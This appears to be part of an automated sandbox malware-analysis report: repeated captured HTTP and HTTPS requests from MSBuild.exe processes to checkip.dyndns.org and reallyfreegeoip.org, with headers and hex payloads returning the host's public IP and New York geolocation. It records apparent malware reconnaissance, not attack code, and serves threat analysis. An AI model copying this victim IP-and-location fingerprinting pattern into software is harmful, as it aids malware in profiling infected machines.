                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            14192.168.2.649764132.226.247.73807704C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 14, 2024 13:50:24.314376116 CET151OUTGET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 14, 2024 13:50:25.618638039 CET321INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:50:25 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: 6d77ce9d29071eb2514e720ddb20ff03
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            15192.168.2.649766132.226.247.73807704C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 14, 2024 13:50:27.426146030 CET151OUTGET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 14, 2024 13:50:28.729875088 CET321INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:50:28 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: bc6542e5d34b53f9de50bf3cc8bbad93
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                            HTTPS Proxied Packets

                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.649720172.67.177.1344437252C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-14 12:49:39 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-12-14 12:49:40 UTC890INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:40 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169349
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8c91Dt5xMf5%2BE6JKVVejbKsJMNI2RSTJR%2FJuZhu7EJLhUiSZ73%2B7y7rN%2FZsi3B6muOgCEMF0fOp%2BVegVP%2Fj1cPTB1F%2Fa%2Bps4wAkl2vCwDd7LGthnDxOW%2FGqkqRxY%2F5LqCDwBFJGg"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e50b15c00426a-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1709&min_rtt=1709&rtt_var=641&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1707602&cwnd=223&unsent_bytes=0&cid=842dfbd479ed1e79&ts=540&x=0"
                                                                                                                            2024-12-14 12:49:40 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            1192.168.2.649722172.67.177.1344437252C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-14 12:49:41 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                            2024-12-14 12:49:42 UTC878INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:42 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169351
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mHwYGlMMH273zI7amlvU%2FYlG6Lz90U2wvJt%2F0xGyraO8aZPM%2FE7tWgJmVu0oD2nkYYjSJtyE3VNeXU%2Fiwp0SpM41w4njxAWfl4S1sPATXIChdzhvOSf9Vi64PB8dR14Z9b94CTpJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e50be39b44231-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1945&min_rtt=1878&rtt_var=752&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1554845&cwnd=127&unsent_bytes=0&cid=317d37351d0a1237&ts=454&x=0"
                                                                                                                            2024-12-14 12:49:42 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            2192.168.2.649726172.67.177.1344437252C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-14 12:49:45 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                            2024-12-14 12:49:45 UTC884INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:45 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169354
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e53cQg%2FqgmTH9m7wZRH3UqilDUH38g6antX%2BWeu6khHxRH3fOibvwSYSPVxtKEsPmKh%2Fr3%2FBHIoiH92QH%2FWhNFCnR8Q9B%2B6k1goIsrKlrCgmJss%2F2ilxOqPXQATvVSiRBK15DWg2"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e50d3bf151885-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1519&min_rtt=1514&rtt_var=578&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1877813&cwnd=193&unsent_bytes=0&cid=86fd80e0535ee8d3&ts=453&x=0"
                                                                                                                            2024-12-14 12:49:45 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            3192.168.2.649730172.67.177.1344437252C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-14 12:49:48 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                            2024-12-14 12:49:48 UTC876INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:48 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169357
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gt1U%2BlMklbYvp5w9uFWdsST9oEsCxG0BVjFPEGBtDtLzHZW2T4j8buZhKogqsgNb%2F6EpxdSdfCQkjM6kH0izRICh0XfCb7F%2F6mlG1MQEooEct2nJWmnx1HJOL986QSy4TbngHg3k"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e50e6dcb3efa5-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2032&min_rtt=2019&rtt_var=784&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1371535&cwnd=194&unsent_bytes=0&cid=70dc5a0a8efbc197&ts=450&x=0"
                                                                                                                            2024-12-14 12:49:48 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            4192.168.2.649734172.67.177.1344437704C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-14 12:49:50 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-12-14 12:49:51 UTC878INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:51 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169360
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yBpGqXlnK8BPBElhZ%2F4QSUt%2FplO8MZ%2FHSlLXI39QXCdWHDEwwTvZ9bgOB1KhExqCt4Ql1A18eg8briLKF5j5EEbPqxO8ctrn%2B9Fgj98VQazMvKROwprl0ZKwkds31c7AsRjvJOu6"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e50f6b9d66a5f-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1638&min_rtt=1632&rtt_var=624&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1737061&cwnd=187&unsent_bytes=0&cid=e4e46669f848c894&ts=454&x=0"
                                                                                                                            2024-12-14 12:49:51 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            5192.168.2.649735172.67.177.1344437252C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-14 12:49:51 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-12-14 12:49:51 UTC872INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:51 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169360
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nZ91IrNutCXxBQILeNrNsDb77qkI3bTysXnIIm4oYcnhMRquA7Xw6u3Vqpc1otSnPN7PsvkxYanK2gxXXR1Gn2l84jtX4cslRHiX%2FE2p1MB1oABtFbmaEBtYOJuRzeGphrhP3oE3"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e50fa282342e8-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2233&min_rtt=2232&rtt_var=840&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1300668&cwnd=250&unsent_bytes=0&cid=28b6ca617b33a2fc&ts=457&x=0"
                                                                                                                            2024-12-14 12:49:51 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            6192.168.2.649736172.67.177.1344437704C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-14 12:49:52 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                            2024-12-14 12:49:53 UTC874INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:53 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169362
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aVGZ38zgXEi2QqtHVWA5SzRwwXmxSJG6I6YwzZ8yEaHJjTBFbNARAQTyNDbbBHEGzNIIo%2BVkPf%2FE0HOD7UdweG1UXNAVtIsyVVy2iCU9IclsP97v5wctY4cKzMcqVDuEDBPRFveV"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e5103b8a043b8-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1584&rtt_var=608&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1777236&cwnd=231&unsent_bytes=0&cid=ade79fc1acf9e12c&ts=463&x=0"
                                                                                                                            2024-12-14 12:49:53 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            7192.168.2.649739172.67.177.1344437252C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-14 12:49:54 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                            2024-12-14 12:49:54 UTC876INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:54 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169363
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r3CKf4K03MDnwdJ%2BryhYNPXyqaG4bLdxxSod9PqhiJOHa4ffWixwXgbclpFlBV1jvRZWaU1hoP%2FuUl3eIg56sbvOJzMP1QM8a%2F2v2hVmg3IknNquzwTHd1eGVBjgETLuldohXK6r"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e510d5caa0f77-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1554&min_rtt=1495&rtt_var=603&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1953177&cwnd=231&unsent_bytes=0&cid=d0634031c54000e1&ts=449&x=0"
